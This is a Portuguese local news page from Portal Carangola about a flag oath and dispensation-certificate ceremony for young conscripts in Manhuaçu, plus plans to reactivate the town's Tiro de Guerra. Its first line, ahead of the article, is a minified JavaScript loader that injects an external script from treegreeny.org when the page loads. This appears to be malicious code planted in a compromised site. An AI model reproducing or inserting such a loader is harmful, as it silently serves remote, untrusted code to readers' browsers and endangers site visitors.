;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu - Jovens alistados participam de juramento à Bandeira e entrega de CDI. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu – Jovens alistados participam de juramento à Bandeira e entrega de CDI.

A Décima Quinta Delegacia do Serviço Militar de Manhuaçu promoveu nesta sexta-feira, 08, na quadra do Colégio Tiradentes, solenidade de juramento à bandeira e entrega do Certificado de Dispensa de Incorporação – CDI. Dos 305 jovens que fizeram o alistamento, mais de 200 compareceram à cerimônia, comandada pelo Tenente do Exército Gilson Antônio de Araújo, Delegado da Décima quinta Delegacia do Serviço Militar.

O prefeito Nailton Heringer participou da cerimônia e destacou o momento de cidadania e maturidade dos jovens que começam a reconhecer os compromissos com a pátria, apesar de serem dispensados do serviço militar obrigatório. “Os jovens têm as possibilidades de fazer concursos públicos mesmo para as forças armadas, porque há esses espaços” – completou o prefeito de Manhuaçu.

“O jovem está com a visão para o futuro neste momento, cheio de força e quanto mais informado melhor. Nós parabenizamos essa turma imensa, só aqui são mais de 200 jovens hoje, de mais de 300 convocados” – pontuou o prefeito. “Essa massa jovem dominante é muito importante como força de trabalho, como transformação e como futuro” – concluiu Nailton Heringer.

Os jovens de Manhuaçu, que completaram 18 anos e fizeram o alistamento militar, participaram da solenidade marcada pela execução do hino nacional, juramento à bandeira e entrega do Certificado de Dispensa de Incorporação – CDI. O tenente Gilson Araújo lembrou que o documento recebido pelos jovens, que mostra a quitação com o serviço militar, é cobrado por vários seguimentos da sociedade e empresas, seja para emprego, retirada de passaporte junto a polícia federal, faculdades entre outros.

O certificado de dispensa não exime o jovem de servir o Exército. Segundo o Tenente Gilson Araújo, o jovem está apenas sendo dispensado do serviço militar obrigatório que é previsto em lei. “Aqueles que sentem a vocação para o serviço militar e caso queiram continuar prestando serviço a pátria, podem prestar concurso público para o Exército, Marinha e Aeronáutica. São diversos níveis de escolaridade e de faixa etária também” – pontuou.

A Décima Quinta Delegacia do Serviço Militar é responsável por 23 municípios da região, incluindo a Junta do Serviço Militar de Manhuaçu. A solenidade de entrega do certificado de dispensa aos jovens na cidade ocorre três vezes ao ano, sendo a próxima no mês de agosto.

REATIVAÇÃO DO TIRO DE GUERRA

Perguntado sobre a possibilidade de volta do Tiro de Guerra no município, o Tenente Gilson Araújo afirmou que seria muito importante. “A sociedade de Manhuaçu e eu particularmente, torcemos para que haja esse retorno do Tiro de Guerra que é, na verdade, uma escola de civismo, que ensina aos jovens valores importantes que infelizmente vão se perdendo ao longo do tempo” – comentou.

“Há uma previsão, com uma lei assinada pelo prefeito Nailton Heringer no ano passado, autorizando a reativação do Tiro de Guerra. Alguns trâmites burocráticos devem ser seguidos para que seja reativado mas, no que depender do Exército brasileiro, o Tiro de Guerra será reativado em Manhuaçu” – completou o Tenente Gilson.

 O prefeito Nailton Heringer afirmou que a reativação do Tiro de Guerra está sendo trabalhada. “Faltam alguns ajustes com o Exército mas temos trabalhado, tivemos contato a pouco tempo sobre esse assunto e estamos na expectativa de haver a finalização dessa negociação para termos de volta o nosso Tiro de Guerra”.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.